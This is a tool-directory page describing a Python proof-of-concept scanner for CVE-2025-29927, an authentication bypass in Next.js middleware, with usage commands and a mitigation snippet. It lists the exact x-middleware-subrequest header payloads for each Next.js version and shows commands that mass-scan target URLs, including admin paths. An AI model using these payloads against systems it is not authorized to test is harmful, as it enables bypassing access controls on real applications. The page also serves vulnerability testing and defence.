Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
poc-nextjs-CVE-2025-29927 — Automatisierter PoC-Scanner für die CVE-2025-29927 Next.js Middleware-Bypass-Schwachstelle. Testet mehrere x-middleware-subrequest-Payloads über Ziel-URLs mit gleichzeitigem Scannen und JSON-Export. | Kitploit
Tools/GitHubGitHub/ticofookfook/poc-nextjs-cve-2025-29927
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubticofookfook/poc-nextjs-cve-2025-29927

poc-nextjs-CVE-2025-29927

Automatisierter PoC-Scanner für die CVE-2025-29927 Next.js Middleware-Bypass-Schwachstelle. Testet mehrere x-middleware-subrequest-Payloads über Ziel-URLs mit gleichzeitigem Scannen und JSON-Export.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 1 JahrNoch nicht geprüft

Scanner für Next.js Middleware Subrequest Schwachstelle

Ein robustes Proof-of-Concept-Tool (PoC) zur Erkennung der Next.js Middleware-Schwachstelle (CVE-2025-29927).

Übersicht

Dieses Tool testet eine kritische Schwachstelle in Next.js-Anwendungen, bei der der Header x-middleware-subrequest verwendet werden kann, um im Middleware implementierte Sicherheitsüberprüfungen zu umgehen. Der Exploit beinhaltet das Senden von HTTP-Anfragen mit spezifischen schädlichen Headern, die je nach Next.js-Version variieren.

Wie der Exploit funktioniert

Laut der Forschung gibt es unterschiedliche Payloads für verschiedene Versionen von Next.js:

  1. Versionen vor 12.2:

    root@kitploit:~
    x-middleware-subrequest: pages/_middleware
    
  2. Versionen ab 12.2:

    root@kitploit:~
    x-middleware-subrequest: middleware
    

    oder

    root@kitploit:~
    x-middleware-subrequest: src/middleware
    

    (falls die Anwendung das src-Verzeichnis verwendet)

  3. Neuere Versionen (wie 15.x):

    root@kitploit:~
    x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
    

    oder

    root@kitploit:~
    x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
    

Unser PoC testet alle diese Payloads automatisch und meldet, welcher erfolgreich war.

Funktionen

  • Testen eines oder mehrerer Ziele
  • Gleichzeitiges Scannen mit Multithreading
  • Anpassbare Anfragepfade
  • Automatisches Testen aller möglichen Payloads
  • Detaillierte und farbige Ausgabe im Terminal
  • Exportieren der Ergebnisse als JSON
  • Robuste Fehlerbehandlung
  • Umfassende Schwachstellenerkennung

Voraussetzungen

  • Python 3.7+
  • Erforderliche Pakete:
    • requests
    • colorama

Installation

root@kitploit:~
# Clone o repositório ou baixe os arquivos
# Navegue até o diretório
cd poc-nextjs-2025

# Instale os pacotes necessários
pip install -r requirements.txt

Verwendung

root@kitploit:~
python main.py -u https://exemplo.com   # Testar uma única URL
python main.py -f alvos.txt             # Testar múltiplas URLs de um arquivo

Befehlszeilenargumente

Beispiele

root@kitploit:~
# Escaneamento básico de um único alvo
python main.py -u https://exemplo.com

# Escanear múltiplos alvos com caminhos personalizados
python main.py -f alvos.txt -p /api/users,/admin,/dashboard

# Escanear com maior concorrência e timeout mais longo
python main.py -u https://exemplo.com -t 10 --timeout 15

# Salvar resultados em um arquivo JSON
python main.py -u https://exemplo.com -o resultados_scan.json

Erkennungsmethodik

Der Scanner funktioniert wie folgt:

  1. Senden einer normalen Anfrage an das Ziel
  2. Senden von Anfragen mit verschiedenen Variationen des Headers x-middleware-subrequest entsprechend der Next.js-Versionen
  3. Vergleich der Antworten zur Identifizierung von Schwachstellenindikatoren:
    • Normale Anfrage blockiert (4xx/5xx), aber Exploit-Anfrage erlaubt (2xx)
    • Signifikanter Unterschied im Antwortinhalt
    • Hinweise auf Umgehung der Authentifizierung/Autorisierung

Schadensbegrenzung

Wenn Sie anfällige Anwendungen entdecken, wenden Sie diese Gegenmaßnahmen an:

  • Aktualisieren Sie auf die Versionen 14.2.25 oder 15.2.3 oder höher von Next.js
  • Implementieren Sie ein Middleware, das Anfragen mit dem Header x-middleware-subrequest blockiert
root@kitploit:~
export function middleware(request: NextRequest) {
  if (request.headers.has('x-middleware-subrequest')) {
    return new Response('Unauthorized', { status: 401 });
  }
  return NextResponse.next();
}
Tool herunterladen
OptionBeschreibung
-u, --url URLZiel-URL zum Scannen
-f, --file ARQUIVODatei mit mehreren zu scannenden URLs (eine pro Zeile)
-p, --paths CAMINHOSKommagetrennte Liste von zu testenden Pfaden (Standard: gängige Pfade)
-t, --threads NAnzahl gleichzeitiger Threads (Standard: 5)
-o, --output ARQUIVOErgebnisse in JSON-Datei speichern
--timeout NAnfrage-Timeout in Sekunden (Standard: 10)